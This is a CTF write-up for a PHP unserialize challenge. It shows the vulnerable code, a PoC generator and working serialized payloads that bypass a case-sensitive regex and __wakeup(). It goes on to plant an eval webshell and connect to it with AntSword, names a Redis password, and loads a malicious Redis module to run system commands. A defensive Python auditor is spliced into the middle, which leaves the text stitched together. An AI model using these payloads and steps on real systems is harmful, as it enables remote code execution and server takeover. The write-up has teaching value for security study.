[天翼杯 2021]esay_eval
<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
    }
    function __wakeup(){
        $this->code = "";
    }
}
class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);//requires the number after "A"/"B" to be 1, but the pattern is case-sensitive while PHP class names are not, so "a"/"b" bypass it
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);
    }
}else{
    highlight_file(__FILE__);
}
PoC:
<?php
class a{
    public $code = "";
    function __construct(){
        $this->code = "phpinfo();";
    }
}
class b{
    function __construct(){
        $this->a=new a();
    }
}
echo serialize(new b());
// PHP class names are case-insensitive, so a/b are unserialized as the gadget classes A/B
?>
// Output: O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}
// Change it to O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}} to bypass both the regex check and __wakeup() (older PHP releases skip __wakeup() when the declared property count does not match the properties actually present)
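The two tricks above can be checked for mechanically. The following is an added example, not code from the writeup or the challenge: it mirrors the challenge's case-sensitive regex check in Python, then parses the serialized payload properly and flags gadget class names written in a different case as well as objects whose declared property count differs from what is actually present. The gadget class names A/B come from the challenge; the payloads in the test are constructed from the writeup's PoC.

```python
import re

GADGETS = {"A", "B"}  # classes the challenge's regex tries to guard

def challenge_filter_blocks(poc):
    """Mirror of the challenge's check; case-sensitive, so "a"/"b" are never inspected."""
    for cap in re.findall(r'"[BA]":(.*?):', poc, re.S):
        m = re.match(r"\s*[+-]?\d+", cap)  # intval(): leading integer, else 0
        if (int(m.group()) if m else 0) != 1:
            return True  # the challenge would exit("you want to bypass wakeup ? no !")
    return False
class PhpSerialized:
    """Recursive-descent parser for the O/a/s/i subset of PHP's serialize() format."""
    def __init__(self, data):
        self.s, self.pos, self.findings = data, 0, []
    def expect(self, ch):
        if self.s[self.pos] != ch: raise ValueError(f"expected {ch!r} at offset {self.pos}")
        self.pos += 1
    def read_until(self, ch):  # token up to ch, consuming ch
        end = self.s.index(ch, self.pos)
        tok, self.pos = self.s[self.pos:end], end + 1
        return tok
    def parse(self):
        t = self.s[self.pos]; self.pos += 1
        if t == "i": self.expect(":"); return int(self.read_until(";"))
        if t == "s":  # s:<len>:"<bytes>";
            self.expect(":"); n = int(self.read_until(":")); self.expect('"')
            val = self.s[self.pos:self.pos + n]; self.pos += n
            self.expect('"'); self.expect(";"); return val
        if t in "aO":  # a:<n>:{...}  or  O:<len>:"<class>":<n>:{...}
            self.expect(":"); cls, head = None, self.read_until(":")
            if t == "O":
                self.expect('"'); cls = self.read_until('"'); self.expect(":")
                head = self.read_until(":")
            self.expect("{"); declared, items = int(head), {}
            while self.s[self.pos] != "}":  # count what is really present, not what is declared
                k = self.parse(); items[k] = self.parse()
            self.expect("}")
            if cls is not None:
                if cls.upper() in GADGETS and cls != cls.upper():
                    self.findings.append(f"{cls!r}: gadget class {cls.upper()} spelled to evade the case-sensitive regex")
                if declared != len(items):
                    self.findings.append(f"{cls!r}: declares {declared} properties, carries {len(items)} (__wakeup bypass)")
                items["__class__"] = cls
            return items
        raise ValueError(f"unsupported type {t!r} at offset {self.pos - 1}")
def audit(poc):  # parse the whole payload; an empty list means neither trick is present
    p = PhpSerialized(poc); p.parse()
    return p.findings
```

The lesson for the defender is the same either way: a regex over the serialized string is not a parser, and unserialize() on request data should be avoided or restricted with allowed_classes.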
Many functions turn out to be disabled.
Write a webshell and connect with AntSword:
?poc=O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:16:"eval($_POST[1]);";}}
Found:
Redis password: you_cannot_guess_it
Redis management plugin (AntSword): git clone https://github.com/Medicean/AS_Redis.git
Malicious module exploit: git clone https://github.com/Dliv3/redis-rogue-server.git
- Upload exp.so to /var/www/html
- Connect to Redis and run MODULE LOAD "/var/www/html/exp.so"
- RCE: system.exec "cat /f*"
Remember to refresh Redis.